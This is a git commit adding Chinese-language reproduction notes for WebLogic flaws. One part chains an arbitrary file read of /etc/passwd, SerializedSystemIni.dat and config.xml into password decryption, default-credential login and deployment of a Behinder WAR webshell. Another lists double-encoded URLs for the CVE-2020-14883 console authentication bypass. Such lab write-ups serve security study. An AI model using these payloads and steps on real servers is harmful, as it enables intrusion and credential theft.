add weblogic 未授权访问漏洞、弱口令&任意文件上传漏洞

2022-03-01 10:18:29 +08:00 · 2022-03-01 10:18:29 +08:00 · 2cffafd25a
commit 2cffafd25a
parent c192a67d0f
13 changed files with 55 additions and 1 deletions
--- a/弱口令&任意文件上传漏洞/README.MD
+++ b/弱口令&任意文件上传漏洞/README.MD
@ -1 +1,43 @@
-# 
+# CVE-2019-2618 弱口令&任意文件上传漏洞
+
+> 利用任意文件读取来获取weblogic的弱口令登录进入后台，然后通过上传getshell，通过构造任意文件下载漏洞环境读取到后台用户名和密码，然后登陆进后台，上传webshell。
+
+## 影响版本
+   WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
+   
+## 漏洞复现
+1. 任意文件读取  
+    访问`http://IP:7001/hello/file.jsp?path=/etc/passwd` 成功获取到账号和密码
+    
+    ![任意文件读取](images/任意文件读取.png)  ![pass](images/password.png)
+    
+     不过只能读取一些文件，如何更深层次利用这个漏洞呢？weblogic密码使用AES（老版本3DES）加密，对称加密可解密，只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下，名为SerializedSystemIni.dat和config.xml。SerializedSystemIni.dat是一个二进制文件，所以一定要用burpsuite来读取，用浏览器直接下载可能引入一些干扰字符。在burp里选中读取到的那一串乱码，这就是密钥，右键copy to file就可以保存成一个文件：
+     
+     `http://yourIp:7001/hello/file.jsp?path=security/SerializedSystemIni.dat`
+     
+     ![SerializedSystemIni.dat](images/SerializedSystemIni.dat.png)
+     
+      config.xml是base_domain的全局配置文件，所以乱七八糟的内容比较多，找到其中的的值，即为加密后的管理员密码
+      
+      `http://yourIP:7001/hello/file.jsp?path=config/config.xml`
+      
+      ![config.xml](images/config.xml.png)
+      
+      使用解密工具进行解密
+      
+      ![decrypt](images/decrypt.png)
+      
+  2. 后台上传getshell  
+    使用解密后的账号密码登录后台，weblogic常见的弱密码  
+    `https://cirt.net/passwords?criteria=weblogic 
+     这里使用 用户名:weblogic 密码:Oracle@123 登录`
+     
+     进入后台后点击左边的部署，找到可以上传文件的地址  
+     ![deploy](images/deploy.png)  
+     这里使用冰蝎里面自带的jsp一句话生成war马  
+     `jar -cvf shell.war shell.jsp`  
+      生成war后将war马部署上去  
+     ![muma1](images/muma1.png)  
+     ![muma1](images/muma2.png)  
+     使用冰蝎进行连接(默认密码为rebeyond)，成功getshell  
+     ![muma1](images/muma3.png)  
--- a/弱口令&任意文件上传漏洞/images/SerializedSystemIni.dat.png
+++ b/弱口令&任意文件上传漏洞/images/SerializedSystemIni.dat.png
--- a/弱口令&任意文件上传漏洞/images/config.xml.png
+++ b/弱口令&任意文件上传漏洞/images/config.xml.png
--- a/弱口令&任意文件上传漏洞/images/decrypt.png
+++ b/弱口令&任意文件上传漏洞/images/decrypt.png
--- a/弱口令&任意文件上传漏洞/images/deploy.png
+++ b/弱口令&任意文件上传漏洞/images/deploy.png
--- a/弱口令&任意文件上传漏洞/images/muma1.png
+++ b/弱口令&任意文件上传漏洞/images/muma1.png
--- a/弱口令&任意文件上传漏洞/images/muma2.png
+++ b/弱口令&任意文件上传漏洞/images/muma2.png
--- a/弱口令&任意文件上传漏洞/images/muma3.png
+++ b/弱口令&任意文件上传漏洞/images/muma3.png
--- a/弱口令&任意文件上传漏洞/images/password.png
+++ b/弱口令&任意文件上传漏洞/images/password.png
--- a/弱口令&任意文件上传漏洞/images/任意文件读取.png
+++ b/弱口令&任意文件上传漏洞/images/任意文件读取.png
--- a/弱口令&任意文件上传漏洞/weblogic解密工具/weblogic_decrypt.jar
+++ b/弱口令&任意文件上传漏洞/weblogic解密工具/weblogic_decrypt.jar
--- a/未授权访问/README.MD
+++ b/未授权访问/README.MD
@ -0,0 +1,12 @@
+# weblogic 未授权访问漏洞
+>   远程攻击者可以构造特殊的HTTP请求，在未经身份验证的情况下接管 WebLogic Server Console。权限绕过漏洞（CVE-2020-14883），访问以下URL，未授权访问到管理后台页面（低权限的用户）
+>
+
+```shell script
+/console/images/%252E%252E%252Fconsole.portal
+/console/css/%252e%252e%252fconsole.portal  （小写可绕过补丁）
+/console/css/%25%32%65%25%32%65%25%32%66console.portal
+```
+
+![console](images/console.png)    
+此时的权限很低，并不能在后台安装应用
--- a/未授权访问/images/console.png
+++ b/未授权访问/images/console.png